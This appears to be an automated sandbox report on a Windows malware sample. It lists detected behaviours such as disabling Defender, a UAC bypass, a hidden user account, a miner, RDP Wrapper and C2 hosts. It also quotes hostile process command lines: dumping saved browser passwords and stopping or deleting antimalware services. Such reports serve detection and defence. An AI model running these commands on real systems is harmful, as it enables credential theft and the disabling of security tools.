Analysis Overview
SHA256
b072506b100e143611b6b01f8e4ac35115665771f6f25685d1e5f5426cc7f03b
Threat Level: Known bad
The file bd38e93c22ab359d615e7464fd252363_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Modifies visibility of hidden/system files in Explorer
Windows security bypass
Disables service(s)
Modifies Windows Defender Real-time Protection settings
RMS
NirSoft WebBrowserPassView
Grants admin privileges
Nirsoft
Stops running service(s)
Blocks application from running via registry modification
Server Software Component: Terminal Services DLL
Possible privilege escalation attempt
Drops file in Drivers directory
Modifies Windows Firewall
Sets file to hidden
ACProtect 1.3x - 1.4x DLL software
UPX packed file
Loads dropped DLL
Reads user/profile data of web browsers
Modifies file permissions
Executes dropped EXE
Cryptocurrency Miner
Checks computer location settings
ASPack v2.12-2.42
Checks whether UAC is enabled
Adds Run key to start application
Modifies WinLogon
Legitimate hosting services abused for malware hosting/C2
AutoIT Executable
Drops file in System32 directory
Hide Artifacts: Hidden Users
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Enumerates physical storage devices
Command and Scripting Interpreter: PowerShell
Delays execution with timeout.exe
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Script User-Agent
Suspicious behavior: LoadsDriver
Kills process with taskkill
Modifies system certificate store
Suspicious behavior: SetClipboardViewer
Scheduled Task/Job: Scheduled Task
Gathers network information
Runs net.exe
Suspicious use of WriteProcessMemory
Runs .reg file with regedit
Suspicious use of AdjustPrivilegeToken
System policy modification
Uses Task Scheduler COM API
Checks processor information in registry
Modifies registry class
Views/modifies file attributes
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-19 07:13
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 07:13
Reported
2024-06-19 07:16
Platform
win7-20240221-en
Max time kernel
150s
Max time network
147s
Command Line
Signatures
Disables service(s)
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Modifies visibility of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\ProgramData\RealtekHD\taskhostw.exe | N/A |
RMS
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\regedit.exe | N/A |
Grants admin privileges
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocks application from running via registry modification
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible privilege escalation attempt
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" | C:\rdp\RDPWInst.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Stops running service(s)
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Cryptocurrency Miner
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | C:\ProgramData\RealtekHD\taskhostw.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\rdp\RDPWInst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
Hide Artifacts: Hidden Users
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\windowsnode | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\hhsm | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\min | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\hs_module | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\WindowsDefender | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Programdata\Windows\winit.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Programdata\Windows\winit.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database | C:\Programdata\Windows\winit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | C:\Programdata\Windows\winit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | C:\Programdata\Windows\winit.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary certificate blob omitted) | C:\rdp\RDPWInst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\rdp\RDPWInst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary certificate blob omitted) | C:\rdp\RDPWInst.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\RealtekHD\taskhostw.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Programdata\Windows\rfusclient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\icacls.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\ProgramData\WindowsTask\AppHost.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\ProgramData\WindowsTask\AppHost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\rdp\RDPWInst.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"
C:\ProgramData\Microsoft\Intel\Logs.exe
C:\ProgramData\Microsoft\Intel\Logs.exe -pnaxui
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Programdata\Microsoft\Intel\L.bat" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\ProgramData\Microsoft\Intel\winit.exe
C:\ProgramData\Microsoft\Intel\winit.exe -pnaxui
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Programdata\Windows\install.vbs"
C:\Programdata\Windows\winit.exe
"C:\Programdata\Windows\winit.exe"
C:\ProgramData\Microsoft\Intel\Cheat.exe
C:\ProgramData\Microsoft\Intel\Cheat.exe -pnaxui
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Programdata\Windows\install.bat" "
C:\Windows\SysWOW64\regedit.exe
regedit /s "regedit.reg"
C:\Windows\SysWOW64\sc.exe
sc start appidsvc
C:\programdata\microsoft\intel\svchost.exe
"C:\programdata\microsoft\intel\svchost.exe"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
C:\programdata\microsoft\intel\P.exe
C:\programdata\microsoft\intel\P.exe
C:\Windows\SysWOW64\sc.exe
sc start appmgmt
C:\programdata\microsoft\rootsystem\P.exe
"C:\programdata\microsoft\rootsystem\P.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\programdata\microsoft\rootsystem\P.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
C:\programdata\microsoft\rootsystem\1.exe
C:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt
C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop swprv
C:\Windows\SysWOW64\sc.exe
sc stop swprv
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config swprv start= disabled
C:\Windows\SysWOW64\sc.exe
sc config swprv start= disabled
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop crmsvc
C:\Windows\SysWOW64\sc.exe
sc stop crmsvc
C:\programdata\microsoft\intel\R8.exe
C:\programdata\microsoft\intel\R8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
C:\Programdata\Windows\rutserv.exe
rutserv.exe /silentinstall
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\rdp\pause.bat" "
C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
